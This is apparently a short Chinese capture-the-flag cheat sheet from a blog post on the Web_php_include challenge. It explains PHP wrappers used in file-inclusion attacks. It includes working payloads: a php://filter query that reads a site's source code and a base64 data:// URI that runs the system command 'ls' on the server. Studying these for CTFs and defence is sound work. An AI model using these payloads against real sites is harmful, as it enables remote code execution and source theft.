常用伪协议用法:
1. php伪协议
用法:(大小写都可以)
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter
2. data协议
用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
3. file协议
用法:
file://[本地文件系统的绝对路径]
攻防世界-Web_php_include详解_攻防世界 web_php_include-CSDN博客
- Web_php_include include Web phpweb_php_include web_php_include include web php web_xctf_writeup web_php_include web writeup web_php_include web include专题 web_buuctf_writeup新生include writeup web_php_unserialize xctf-web_php_unserialize web_php_unserialize web_xctf_writeup unserialize web_php_unserialize unserialize web专题 web_xctf_writeup writeup php2 xctf